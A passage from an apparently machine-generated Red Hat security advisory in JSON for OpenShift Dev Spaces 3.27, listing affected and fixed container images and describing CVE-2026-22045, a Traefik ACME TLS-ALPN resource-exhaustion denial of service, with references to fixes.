"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "io.vertx/vertx-core: static handler component cache can be manipulated to deny the access to static files"
},
{
"cve": "CVE-2026-22045",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-15T23:01:12.589198+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2430198"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Traefik, an HTTP reverse proxy and load balancer. This vulnerability exists in the ACME TLS-ALPN fast path, where unauthenticated clients can exploit it. By initiating numerous connections and sending a minimal ClientHello with \"acme-tls/1\" before ceasing communication, a malicious client can indefinitely tie up system resources such as \"go routines\" (lightweight threads) and file descriptors. This leads to a Denial of Service (DoS) of the entry point, making the service unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "traefik: Traefik: Denial of Service via ACME TLS-ALPN fast path resource exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Moderate for Red Hat. In the Red Hat context, this flaw affects Traefik as deployed in Red Hat OpenShift Dev Spaces. An unauthenticated attacker can exploit the ACME TLS-ALPN fast path to exhaust system resources, leading to a denial of service of the entry point.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-22045"
},
{
"category": "external",
"summary": "RHBZ#2430198",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430198"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-22045",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22045"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22045",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22045"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/commit/e9f3089e9045812bcf1b410a9d40568917b26c3d",
"url": "https://github.com/traefik/traefik/commit/e9f3089e9045812bcf1b410a9d40568917b26c3d"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/releases/tag/v2.11.35",
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.35"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/releases/tag/v3.6.7",
"url": "https://github.com/traefik/traefik/releases/tag/v3.6.7"
},
{
"category": "external",
